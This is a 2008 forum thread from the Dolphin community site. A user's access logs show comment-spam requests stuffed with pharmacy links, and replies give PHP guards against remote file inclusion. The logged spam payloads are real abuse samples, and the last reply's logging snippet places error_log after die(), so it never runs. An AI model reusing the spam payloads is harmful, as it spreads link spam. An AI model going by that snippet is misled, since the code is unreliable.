is my site hacked?

sbond posted 28th of September 2008 in Community Voice. 20 comments.

Recently I found out that my webserver is overloaded. I viewed the access log and found entries like this:

62.112.193.34 - - [28/Sep/2008:12:16:22 +0400] "GET /Alina11_22?CmtText=pharmacy%3B+http%3A%2F%2Fwww.da.eng.ufmg.br%2Fforum%2Fviewtopic.php%3Fp%3D6172%236172+hoodia+en+pharmacie%3B+http%3A%2F%2Fcontent.ix2.net%2Fshowthread.php%3Fp%3D66277%23post66277+cialis+substitute%3B+http%3A%2F%2Fwww.acidpit.info%2Fviewtopic.php%3Fp%3D26550%2326550+alternative+to+cialis%3B+http%3A%2F%2Fwww.alladstop.com%2Fforums%2Fviewtopic.php%3Fp%3D711623%23711623+hoodia+gordini%3B+http%3A%2F%2Firadepuiff.ru%2Fforum%2Fviewtopic.php%3Fp%3D1018%231018+tratamientos+para+la+eyaculacion+precoz%3B+http%3A%2F%2Ftricitiesultimate.com%2Fphpbb%2Fviewtopic.php%3Fp%3D32953%2332953+natural+cialis%3B+http%3A%2F%2Fjuegos.tv%2Fconsolas%2Fforo%2Fviewtopic.php%3Fp%3D1528%231528+natural+male+enhancement+products%3B+http%3A%2F%2Fwww.sportlinksnetwork.com%2Fkayakfishing%2Fviewtopic.php%3Fp%3D149537%23149537+natural+alternative+to+cialis%3B+http%3A%2F%2Fthebravehearts.org%2FBB%2Fviewtopic.php%3Fp%3D75269%2375269+cialis+substitute%3B+http%3A%2F%2F163.26.133.1%2Fxoops228%2Fmodules%2Fnewbb%2Fviewtopic.php%3Ftopic_id%3D161170%26post_id%3D285757%26order%3D0%26viewmode%3Dflat%26pid%3D0%26forum%3D3%23forumpost285757+%C3%A9jaculation+pr%C3%A9matur%C3%A9e%3B+http%3A%2F%2Fblogdogs.co.uk%2Fviewtopic.php%3Fp%3D94481%2394481+curar+la+eyaculacion+precoz%3B+http%3A%2F%2Fwww.dipolognon.com%2Fkagayanonforum%2Fviewtopic.php%3Fp%3D38546%2338546+natural+cialis%3B+http%3A%2F%2Fwww.tibha.com%2FForums%2Fviewtopic.php%3Fp%3D440394%23440394+alternative+to+cialis%3B+http%3A%2F%2Fyour20.net%2Fmodules.php%3Fname%3DForums%26file%3Dviewtopic%26p%3D58746%2358746+help+last+longer+in+bed%3B+http%3A%2F%2Fwww.game.bg%2Fforum%2Fviewtopic.php%3Fp%3D21480%2321480+hoodia+side+effects%3B+http%3A%2F%2Flost.forumche.org%2Fviewtopic.php%3Fp%3D36%2336+last+longer+in+bed%3B+http%3A%2F%2Fwww.ethelredtmo.org%2FphpBB2%2Fviewtopic.php%3Fp%3D195121%23195121+alternative+to+cialis%3B+http%3A%2F%2Fwww.gelreband.nl%2Fforum%2F%2Fviewtopic.php%3Fp%3D351027%23351027+alternative+to+cialis%3B+http%3A%2F%2Fwww.nevadamoms.org%2Fforums%2Fshowthread.php%3Fp%3D37872%23post37872+aumento+de+tama%C3%B1o+del+pene%3B+http%3A%2F%2Fwww.gemat.biz%2Fforum%2Fviewtopic.php%3Fp%3D114%23114+cialis+substitute%3B+http%3A%2F%2Fcontent.ix2.net%2Fshowthread.php%3Fp%3D63930%23post63930+eyaculaci%C3%B3n+precoz%3B+http%3A%2F%2Ftest.wellingtonlivemusic.com%2FphpBB2%2Fviewtopic.php%3Fp%3D232%23232+taille+du+p%C3%A9nis%3B+http%3A%2F%2Fwww.cptce.it%2Fmodules%2Fnewbb%2Fviewtopic.php%3Ftopic_id%3D168929%26post_id%3D460674%26order%3D0%26viewmode%3Dflat%26pid%3D0%26forum%3D1%23forumpost460674+remedios+para+la+eyaculacion+precoz%3B+http%3A%2F%2Fwww.lesjetaime.com%2FphpBB%2Fviewtopic.php%3Ftopic%3D39975%26forum%3D3%260+hoodia+products%3B+http%3A%2F%2Ftherealhelterskelter.com%2Fchat%2F%2Fviewtopic.php%3Fp%3D345741%23345741+natural+male+enhancements%3B+http%3A%2F%2Fwww.torcn.com%2Fforum%2Fviewtopic.php%3Fp%3D461305%23461305+effective+herbal+cialis%2C%0D%3B+http%3A%2F%2Fwww.k1ck.com%2Fforum%2Fviewtopic.php%3Fp%3D350334%23350334+natural+health+hoodia%3B+http%3A%2F%2Fpuchschool2.jino-net.ru%2Fforum%2Ftopic.php%3Fforum%3D1%26topic%3D1683+%C3%A9jaculation+rapide%3B+http%3A%2F%2Fwww.bizclown.com%2FBizforum%2Fviewtopic.php%3Fp%3D316%23316+natural+cialis%3B+http%3A%2F%2Fusers.atw.hu%2Fcsocso-band%2Fforum%2Fviewtopic.php%3Fp%3D3603%233603+fr%C3%BChzeitige+ejakulation%3B+http%3A%2F%2Fpkminami.fu8.com%2Fforum%2Fviewtopic.php%3Fp%3D749%23749+natural+cialis%3B+http%3A%2F%2Farcyk.duu.pl%2Fgra%2F%2Fviewtopic.php%3Fp%3D813%23813+avis+hoodia%3B+http%3A%2F%2Fwww.funnyisraeli.com%2Fviewtopic.php%3Fp%3D442982%23442982+premature+ejactulation+%3B+http%3A%2F%2Fwww.lesjetaime.com%2FphpBB%2Fviewtopic.php%3Ftopic%3D40339%26forum%3D3%260+herbal+cialis%3B+&CmtParent=0 HTTP/1.0" 200 38919 "http://samaroid.ru/Alina11_22" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"


Does it mean that my site is hacked? I see that the charge to my hosting is growing exactly at that moment.

Maybe, it is possible to restrain the lengths of symbols that can be put in browser?

 
Comments
·Oldest
·Top
Please login to post a comment.
sammie
that means your guestbooks are being spammed

no need for profile commets and guest book, so delete the guestbook.php file or rename it to something different
sbond
Thanks, sammie!
The fact is, that I have already deleted guestbook.php file... Maybe it's something else..
sammie
i posted this fix awhile back,

add the fllowing code to your ray/modules/global/inc/content.inc.php

add it at the top above the 1st require once command

if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');

so it looks like this :

if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');

require_once($sIncPath . "xml.inc.php");
require_once($sIncPath . "constants.inc.php");
require_once($sIncPath . "apiFunctions.inc.php");

this stops any see more remote includes being used

next edit /plugins/safehtml/HTMLSax3.php add this at the top above the require once

if (isset($_REQUEST['dir']))
die ('Hacking attempt');

so it looks like this:

if (isset($_REQUEST['dir']))
die ('Hacking attempt');

require_once( "{$dir['plugins']}safehtml/HTMLSax3/States.php" );
require_once( "{$dir['plugins']}safehtml/HTMLSax3/Decorators.php" );

this stops remote access to your directories

you need to move to a more secure host
sbond
Many thanks!!! :)
I'll try it as soon as possible.
sbond
I applied this fix. Thanks once more :) So, I'm waiting for results.
AndreyP
GuestBook was totally rewrote in 6.2,
just wait a little, nobody more can be able to spam in your dolphin
sbond
I'm waiting... Like all other "Delphinoids" do :)
LeonidS
This line require_once('header.inc.php'); in ray/modules/global/content.inc.php of 6.1.4 version should help too. But solution from Sammie is useful too, thnx Sammie for helping other.
sbond
I'm using 6.1.4 version, so, this line us already present.
praveenkv1988
This shows that somebody tried to attack your server by external file inclusion.
sbond
Thank you for the information :)
I'm using 6.1.4 release. register_globals are off. I don't want any problems with some dolphin parts, so I leave allow_url_fopen allowed.
sammie
allow_url_fopen is safe but not allow_url_include
a server is only vulnerable if register_globals and allow_url_include are on, both should be off.
sbond
I applied all fixes. Unfortunately I still see in access log theese long links like

75.150.10.62 - - [30/Sep/2008:12:14:32 +0400] "GET /skandaloff464?CmtText=pharmacy%3B+http%3A%2F%2Fleto2005.variant.lv%2Fforum%2Ftopic.php%3Fforum%3D1%26topic%3D239998+soma%3B+http%3A%2F%2Fglebka.ru%2Fforum%2Fviewtopic.php%3Fp%3D314517%23314517+soma%3B+http%3A%2F%2Fantichp.mypressonline.com%2Ffor .... +soma+usa%3B+&CmtParent=0 HTTP/1.0" 200 37060 "http://samaroid.ru/skandaloff464" "Mozilla/4.0 see more (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

I tried to ban IPs in .htaccess file but it's impossible to do it every day. I'm thinking now to change webhoster company...
buckmcgoo
Is the spam being recorded in your guestbook or not? If it isn't then what they are trying isn't working.. people are always going to TRY and spam you, but I wouldn't swap hosts because of that??
sbond
no, the spam is not recording in guest book, I deleted guestbook.php, but because of theese attempts the webserver is overcharged and I see some alerts in control panel of my hosting.
sammie
so they are just logs of attempts, you will always get attempts you cant do anything about people trying
sbond
I agree with you, sammie :) I can't do anythig about people trying :) So, let them try! :)
I was very pleased to find here so nice people who, in spite of my very bad English, tried to help me :) Thank you all! I am conviced one more time, that I'm on right way I choose to use Dolphin.
praveenkv1988
That won't make any problems. When somebody tries to attack your site these errors will be logged.
earpick
To add to the (fairly dated) discussion, I suggest you log the error as opposed to just screaming "Hacking attempt" pointlessly. Try something like this:

if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');
error_log("HACKING ATTEMPT. User with the IP of ".$_SERVER["REMOTE_ADDR"]." has attempted to hack us using ".$_SERVER["SCRIPT_FILENAME"]);

This should log the error in Apache's error log. Handy!
 
 
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.
PET:0.13627004623413